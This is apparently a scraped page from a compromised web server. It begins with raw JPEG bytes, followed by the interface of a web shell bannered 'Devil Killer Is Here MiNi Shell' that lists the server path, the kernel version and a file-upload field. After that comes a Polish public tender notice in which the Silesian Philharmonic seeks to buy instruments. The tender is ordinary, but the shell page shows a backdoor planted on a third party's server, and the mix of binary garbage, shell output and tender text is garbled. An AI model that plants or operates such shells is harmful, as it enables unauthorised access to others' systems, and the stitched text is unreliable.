JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240627/0038696601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup instrumentów i akcesoriów muzycznych dla Filharmonii Śląskiej <br/>im. Henryka Mikołaja Góreckiego – wiolonczela, skrzypce, altówka, <br/>kontrabas, flet altowy, zestaw perkusyjny, smyczki. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Filharmonia Śląska im. Henryka Mikołaja Góreckiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000279338</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sokolska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-084</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 3511719</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@filharmonia-slaska.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://filharmonia-slaska.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup instrumentów i akcesoriów muzycznych dla Filharmonii Śląskiej <br/>im. Henryka Mikołaja Góreckiego – wiolonczela, skrzypce, altówka, <br/>kontrabas, flet altowy, zestaw perkusyjny, smyczki. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2fba04f4-3476-11ef-acf6-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00386966</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00206914/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup Instrumentów i akcesoriów muzycznych dla Filharmonii Śląskiej im. H. M. Góreckiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/filharmonia_slaska <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej pod adresem: <br/> https://www.platformazakupowa.pl/pn/filharmonia_slaska. <br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, zobowiązany jest posiadać konto na Platformie zakupowej. Rejestracja i utrzymanie konta oraz korzystanie z Platformy zakupowej są bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej opisane zostały w Regulaminie na www.platformazakupowa.pl.<br/>Limit objętości plików lub spakowanych folderów w zakresie całej oferty wynosi 150 MB. Do złożenia oferty, oświadczeń, o których mowa w art. 125 ust. 1 uPzp oraz innych oświadczeń i dokumentów obowiązkowa jest<br/>forma elektroniczna lub postać elektroniczna, opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Instrukcje korzystania z platformy zakupowej dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>Szczegółowe informacje o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z Wykonawcami oraz wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej znajdują się w Rozdziale 9 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że: <br/>1.	Administratorem danych osobowych Wykonawców i osób uczestniczących w przedmiotowym postępowaniu jest Zamawiający.<br/>2.	Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach dotyczących przetwarzania danych osobowych pod adresem e-mail: iod@filharmonia-slaska.eu.<br/>3.	Dane osobowe Wykonawców i osób uczestniczących w przedmiotowym postępowaniu przetwarzane będą na podstawie:<br/>a)	art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia.<br/>b)	art. 6 ust. 1 lit. b RODO w celu związanym z zawarciem umowy lub działaniami zmierzającymi do jej zawarcia.<br/>c)	art. 6 ust. 1 lit. f RODO w celach archiwalnych , dochodzenia roszczeń lub obrony przed roszczeniami lub wypełnienia obowiązków wynikających z innych przepisów.<br/>4.	Odbiorcami danych osobowych Wykonawców i osób uczestniczących w przedmiotowym postępowaniu będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 uPzp. <br/>5.	Dane osobowe osób uczestniczących w przedmiotowym postępowaniu będą przechowywane, zgodnie z art. 97 ust. 1 uPzp, przez okres 4 lat od dnia zakończenia postępowania.<br/>6.	Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio jego dotyczących oraz danych osób uczestniczących w postępowaniu jest wymogiem ustawowym określonym w przepisach uPzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z upup. <br/>7.	W odniesieniu do danych osobowych osób uczestniczących w przedmiotowym postępowaniu decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8.	Osoby uczestniczące w przedmiotowym postępowaniu posiadają:<br/>a)	prawo dostępu do danych osobowych bezpośrednio ich dotyczących na podstawie art. 15 RODO. W przypadku gdy wykonanie przez Zamawiającego obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>b)	W przypadku zakończonego postępowania o udzielenie zamówienia, gdy wykonanie przez Zamawiającego obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania;<br/>c)	prawo do sprostowania przez Wykonawcę uczestniczącego w przedmiotowym postępowaniu danych osobowych na podstawie art. 16 RODO (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z uPzp oraz nie może naruszać integralności protokołu i jego załączników);<br/>d)	prawo żądania od administratora ograniczenia przetwarzania danych osobowych na podstawie art. 18 RODO z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego). Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawcy i osobom uczestniczącym w przedmiotowym postępowaniu nie przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w sprawie naruszenia przepisów RODO dotyczących:<br/>a)	prawa do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>b)	prawa do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	prawa sprzeciwu wobec przetwarzania danych osobowych na podstawie art. 21 RODO, gdyż pod-stawą prawną przetwarzania danych osobowych Wykonawców i osób uczestniczących w przedmiotowym postępowaniu jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/ZP/AT/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wiolonczela klasy mistrzowskiej wykonana przez Ernsta Kesslera ok. 1930 r. w Berlinie lub równoważna z certyfikatem oryginalności posiadająca niżej wymienione cechy:<br/>• lakier: olejny w kolorze czerwono-pomarańczowym,<br/>• menzura instrumentu: 690 mm, <br/>• długość pudła: 755 mm,<br/>• posiada ekspertyzę dendrochronologiczną potwierdzającą wiek użytego drewna,<br/>• przednia płyta wykonana ze świerku, <br/>• boczki i tylna płyta wykonane z klonu, <br/>• szyjka wykonana z drewna klonowego, <br/>• podstrunnica i kołki wykonane z hebanu, <br/>• strunociąg firmy Akusticus lub równoważny, plastikowy, <br/>• nóżka metalowa firmy Weidler lub równoważna,<br/>• komplet strun firmy Larsen model il canone<br/>• futerał Bogaro &amp; Clemente karbonowy lub równoważny </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 190000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37313800-3 - Wiolonczele</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wyboru najkorzystniejszej oferty dokona Komisja przetargowa na podstawie porównania cen ofert oraz jakości instrumentów ocenionych przez powołanych biegłych.<br/>Wybór będzie dokonany na podstawie następujących kryteriów:<br/>a) cena (C)	- 40 %<br/>b) jakość	(J)	- 60 %<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za oferowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość w badanej ofercie<br/><br/>b)	Punktacja za jakość (J) obejmuje następujące elementy: <br/>i) Intonacja: wysokość dźwięku określana pod kątem sprawdzenia równych stosunków częstotliwości (interwałów), mierzona poprzez badanie przyrządem pomiaru częstotliwości fali akustycznej. <br/>do 10 centów 20 pkt<br/>od 10 do 25 centów 10 pkt<br/>powyżej 25 centów 0 pkt <br/>Maksymalna dopuszczalna wartość centów = 25<br/>ii) Wyrównanie brzmienia: Sprawdzenie pasma tonów harmonicznych dźwięku określone oceną na podstawie analizy wrażenia słuchowego muzyków, w całej skali instrumentu. Zgodność długości brzmienia i głośności na każdym poziomie skali instrumentu.<br/>wyrównany 40 pkt<br/>średnio wyrównany 20 pkt<br/>niewyrównany 0 pkt<br/>Minimalna dopuszczalna ilość punktów =20.<br/>iii) Barwa: ocena aspektów barwy na podstawie analizy wrażenia barwy zdefiniowanego semantycznym opisem. <br/>ciepła 0 - 4 pkt <br/>czysta 0 - 4 pkt <br/>głęboka 0 - 4 pkt <br/>jasna 0 - 4 pkt <br/>nośna 0 - 4 pkt <br/>Minimalna dopuszczalna ilość punktów w każdym z powyższych podkryteriów = 2.<br/>iv) Precyzja mechaniki : właściwa precyzja mechaniki charakterystyczna dla danego rodzaju instrumentu.<br/>maksymalnie właściwa precyzja mechaniki 20 pkt <br/>średnia precyzja mechaniki 10 pkt <br/>brak właściwej precyzji mechaniki 0 pkt <br/>Minimalna dopuszczalna ilość punktów = 10.<br/>Ocena za jakość dokonywana jest w pełnych punktach.<br/>Ogólna punktacja za jakość : J = Ji+Jii+Jiii+Jiv<br/>Oceny każdego z instrumentów będzie dokonywać dwóch wskazanych przez Zamawiającego biegłych. <br/>Wykonawca udostępni biegłym instrumenty w uzgodnionym miejscu i czasie w celu dokonania oceny wg kryterium „jakość”. Udostępnione instrumenty powinny być tożsame z oferowanymi. <br/>Na podstawie opinii biegłych członkowie komisji przetargowej przydzielą każdej ocenianej ofercie punkty w kryterium „jakość” w skali jak wyżej. <br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W= C x 40% + J x 60%<br/>gdzie: W	- wynik ostateczny oceny oferty<br/>C	- wynik za kryterium cena wyliczony zgodnie ze wzorem podanym w pkt a)<br/>J	- wynik za kryterium jakość wyliczony zgodnie ze wzorem podanym w pkt b)<br/>Wynik oceny zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Skrzypce klasy mistrzowskiej, wykonane dla pracowni Josepha Hela przez Leona Mougenot w latach 1910-1915 lub równoważne posiadające niżej wymienione cechy:<br/>• certyfikat autentyczności wystawiony przez Jaean-Jacques Rampal lub równoważny,<br/>• wartość użytkowa, artystyczna i historyczna,<br/>• płyta wierzchnia: świerkowa, dwuczęściowa,<br/>• płyta spodnia: jawor falisty, dwuczęściowa,<br/>• boczki: jawor falisty,<br/>• szyjka: jawor falisty,<br/>• lakier: spirytusowy czerwono-brązowo-pomarańczowy z licznymi przetarciami,<br/>• podstrunnica i kołki wykonane z hebanu<br/>•długość korpusu 358 mm, <br/>• szerokość max górą 168,5 mm, <br/>• szerokość max dołem 208 mm, <br/>• szerokość w talii 115 mm.<br/>• futerał Bogaro &amp; Clemente model Nicole lub równoważny </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 128000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37313400-9 - Skrzypce</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wyboru najkorzystniejszej oferty dokona Komisja przetargowa na podstawie porównania cen ofert oraz jakości instrumentów ocenionych przez powołanych biegłych.<br/>Wybór będzie dokonany na podstawie następujących kryteriów:<br/>a) cena (C)	- 40 %<br/>b) jakość	(J)	- 60 %<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za oferowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość w badanej ofercie<br/><br/>b)	Punktacja za jakość (J) obejmuje następujące elementy: <br/>i) Intonacja: wysokość dźwięku określana pod kątem sprawdzenia równych stosunków częstotliwości (interwałów), mierzona poprzez badanie przyrządem pomiaru częstotliwości fali akustycznej. <br/>do 10 centów 20 pkt<br/>od 10 do 25 centów 10 pkt<br/>powyżej 25 centów 0 pkt <br/>Maksymalna dopuszczalna wartość centów = 25<br/>ii) Wyrównanie brzmienia: Sprawdzenie pasma tonów harmonicznych dźwięku określone oceną na podstawie analizy wrażenia słuchowego muzyków, w całej skali instrumentu. Zgodność długości brzmienia i głośności na każdym poziomie skali instrumentu.<br/>wyrównany 40 pkt<br/>średnio wyrównany 20 pkt<br/>niewyrównany 0 pkt<br/>Minimalna dopuszczalna ilość punktów =20.<br/>iii) Barwa: ocena aspektów barwy na podstawie analizy wrażenia barwy zdefiniowanego semantycznym opisem. <br/>ciepła 0 - 4 pkt <br/>czysta 0 - 4 pkt <br/>głęboka 0 - 4 pkt <br/>jasna 0 - 4 pkt <br/>nośna 0 - 4 pkt <br/>Minimalna dopuszczalna ilość punktów w każdym z powyższych podkryteriów = 2.<br/>iv) Precyzja mechaniki : właściwa precyzja mechaniki charakterystyczna dla danego rodzaju instrumentu.<br/>maksymalnie właściwa precyzja mechaniki 20 pkt <br/>średnia precyzja mechaniki 10 pkt <br/>brak właściwej precyzji mechaniki 0 pkt <br/>Minimalna dopuszczalna ilość punktów = 10.<br/>Ocena za jakość dokonywana jest w pełnych punktach.<br/>Ogólna punktacja za jakość : J = Ji+Jii+Jiii+Jiv<br/>Oceny każdego z instrumentów będzie dokonywać dwóch wskazanych przez Zamawiającego biegłych. <br/>Wykonawca udostępni biegłym instrumenty w uzgodnionym miejscu i czasie w celu dokonania oceny wg kryterium „jakość”. Udostępnione instrumenty powinny być tożsame z oferowanymi. <br/>Na podstawie opinii biegłych członkowie komisji przetargowej przydzielą każdej ocenianej ofercie punkty w kryterium „jakość” w skali jak wyżej. <br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W= C x 40% + J x 60%<br/>gdzie: W	- wynik ostateczny oceny oferty<br/>C	- wynik za kryterium cena wyliczony zgodnie ze wzorem podanym w pkt a)<br/>J	- wynik za kryterium jakość wyliczony zgodnie ze wzorem podanym w pkt b)<br/>Wynik oceny zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 